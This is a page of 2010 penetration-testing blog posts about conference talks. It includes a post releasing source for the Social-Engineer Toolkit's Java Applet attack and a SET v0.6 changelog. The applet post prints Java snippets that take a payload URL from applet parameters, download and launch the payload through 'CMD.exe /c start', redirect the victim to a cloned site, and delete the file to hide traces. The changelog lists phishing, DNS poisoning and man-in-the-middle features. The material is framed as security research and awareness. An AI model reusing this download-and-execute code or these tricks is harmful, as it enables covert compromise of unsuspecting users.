Below is the download links for the Metasploit Modules and PowerShell sample code released at Blackhat and (soon to be) Defcon with Josh Kelley (winfang). This talk was the powerful ability to perform advanced tasks through PowerShell and how you can utilize PowerShell on penetration tests. You can get the code here:

Metasploit Modules

PowerShell Samples

Releasing Java Applet Source Code by Thomas Werth

When you are reading this blog, you should already know about the Thomas Werth Java Applet Attack that’s incorporated into the Social-Engineer Toolkit. The attack vector itself has been closed source up until this point and does not specifically rely off of exploiting a vulnerable and is universal in nature. The attack targets Java based installations for Windows, Linux, and Mac based systems and works on fully patched and updated (and old) based Java implementations. Big thanks goes to Java for their feature rich API’s and awesome security model The question that gets posed to me on a number of occasions is, why did I write an
attack vector that is multi-platform and can attack fully patched systems? Simple answer: “For user education“. Java is often considered a secure platform with a sandboxes environment, most developers believe they are impervious to attack. This release isn’t a discussion on whether or not Java is secure or not, it is more so to reveal that Signed Java Applets are susceptible to multiple attack vectors patched or not. It is similar to every application you download from the internet and run on your PC. There is one slight difference though, Java Applets can lie to you and pretend they are issued by Microsoft or Sun without conceptually alerting the user that it could be dangerous.


As a learning and awareness effort to write a proof of concept, I decided to make users learn the hard way A few weeks before writing my applet i stumbled across SET and virtually met David. Long Story short summary: We joined forces – hope you like the result. So let’s talk about the internals of the applet. The applet has to read the operating system specific payload path and the url of the next page to show from it parameters. Then it will check on which platform it is currently running and start to download a specific payload using the browser it runs under. The download is saved as a file in a system specific temp folder. The URL is then changed back to the browser and the downloaded file is started. Finally the applet waits till execution of payload has ended an wipes the file from the hard-disk. That’s all. Really this is enough to beat most security controls on modern systems. To compromise a system it is enough to fool the user and rely on what we see on a screen or trust a human and rely off of what we are used to

A few snippets of the source code show the critical functions.

Initial check of current system:

//get path to temp
String pfad = System.getProperty(“java.io.tmpdir”) + File.separator;
//get operating system
String os = System.getProperty(“os.name”).toLowerCase();

Check if it is a windows system and prepare download url of windows payload:
if (os.indexOf( “win” ) >= 0) //Windows
{
downParm = getParameter( “WIN” );
osType = 0;
pfad += “java.exe”;
}

The download itself is done by a bufferedinputstream and a fileoutputstream. Next part of code i will show is the way the url is changed to fool the user even more. When utilizing the Social-Engineer Toolkit and the Site Cloner, a website is cloned and the victim is tricked into accepting the malicious Java Applet. Once the user accepts the applet and the payload is downloaded and executed on the system, the victim is redirected to the original site cloned and has no idea what just occurred.

//get Parameter nextPage
String page = getParameter( “nextPage” );
//check if parameter is set
if ( page != null && page.length() > 0 )
{
//create url from parameter and tell browser to change url
URL urlPage = new URL(page);
getAppletContext().showDocument(urlPage);
}

Now everything is ready to launch the payload. This is done with a few lines of code, wheres windows part is shown here as example.

//check if operating system is windows
if ( osType < 1 ) //Windows
{
//Java Api call to create a new process.
//Which uses cmd.exe to execute freshly downloaded payload.
f = Runtime.getRuntime().exec(“CMD.exe /c start ” + pfad);
//wait till payload has finished execution
f.waitFor();
//wipe the file to cover your axx
(new File(pfad)).delete();
}

That’s it. Hopefully there’s still some magic left and you don’t blame me how easy this attack is.

In closing, the summary of all of this is to show you that even with the most heavily patched system, with the latest and greatest, there’s always room for exceptions. This method is easy in order to coax a victim into believing that this is not an attack and a normal experience. We as security professionals typically focus heavily on patches and the latest vulnerabilities when we have significant exposures to frameworks and applications that will never be patched. It’s easier for us to believe what we see on a screen or trust a human and rely off of what we are use to instead of what is actually occurring.

Finally i’d like to thank David for his excellent work on SET and his fantastic cooperation! Thank you dude!

Getting ready for some craziness coming up soon in Vegas. Luckily, before the birth of my twins, the majority of our presentations and code was already finished. Be sure to catch me speaking at BSIDESLV, BlackHat, and Defcon this year! I’ll be co-presenting with one of my buddies Josh Kelley (winfang98 on twitter) on a slew of topics. Just want to say you’ll want to swing by, we are releasing new versions of tools, Metasploit modules, new tool releases, and extra code. Wanted to give you a breakdown of each presentation and what to expect.

First things first, the Social-Engineer Toolkit v0.6 will be getting released and this is a whopper. Probably the largest release I think I have ever put through on SET, and it will be an amazing one. I would highly recommend BSIDESLV, it has become my favorite conference out there period. If your missing this one your basically missing the entire point of going to these conferences! Here is the changelog so far on what to expect:

* Number of bug-fixes through SET and better error handling
* Added the tabnabbing attack vector
* Added favicon pulling per site on tabnabbing
* Fixed dynamic import bug with reloading modules after use
* Added Man Left in the Middle (MLITM) from Kos
* Added the latest IE and Adobe exploits
* Rewrote the HTTP web server handler for WebDav based exploits, it will force SET to use port 8080 as the web server as MSF requires WebDav on 80.
* Rearranged the initial web attack vector menu, it needed to be reversed
* Added the ability to specify your own custom executable for MSF encoding (-x) within the config/set_config file, the new option is called ‘CUSTOM_EXE’
* Added checks for BeautifulSoup, it is now a requirement for SET for the MLITM attack
* Fixed the no encoding issue with Java Applet Attack Vector, when specifying no encoding it will not prompt you to encode the payload
* Fixed bleed over colors when bombing out of any of the SET menus
* Added the ability to be able to customize MLITM web server port address in set_config, default is 80.
* Fixed an issue with Java Applet attack where if WEB_PORT was changed from 80, the Windows and NIX payloads would not deploy properly based off of port change
* Fixed an issue where importing your own execubale with the Java Applet attack would fail and not work properly.
* Fixed where OSX and LINUX payloads would still be asked for in payloadgen if not using the Java Applet attack.
* Added the new Teensy Arduino attack vector menu that can be used with the Teensy USB HID devices for physical/social-engineering attacks
* Fixed issue where ettercap was not properly performing DNS_POISON attacks, should now dns poison properly.
* Removed the IP address challenge question when importing your own exe
* Fixed issue where other python applications would close when exiting SET
* Rewrote html handler to fix stderr and stdout issues with subprocess and ettercap handlers, should close properly when exiting SET now
* Fixed the main bug with Linux/OSX via Java Applet and no shell being piped, should now be 100 percent operable (thanks Thomas Werth).

I will be demoing all the new features and releasing SET v0.6 at BSIDESLV exclusively, be sure to be there 7/28/2010 at 3:00PM!

Moving on to BlackHat, me and Josh will be doing the PowerShell – It’s time to own presentation on 7/29/2010 at 10:00AM. Josh and myself have put a ton of time and will be releasing two new metasploit modules/meterpreter scripts and demoing new tools we will be releasing the code for and some new bypass technique methods of PowerShell, you absolutely don’t want to miss this one.

Last but not least, our Defcon presentation will be on Sunday at 12:00PM for the PowerShell omfg talk Me and Josh will be showing everything we did in BlackHat and a lot more including some additional tool releases and a much more in depth talk.

Phew, going to be a busy week for us, and I can tell you I think me and Josh’s fingers are bleeding from the amount of code pumped out during these three talks. As always, be sure to check back here for more news and updates, can also follow me and Josh on twitter: dave_rel1k and winfang98

See you in Vegas!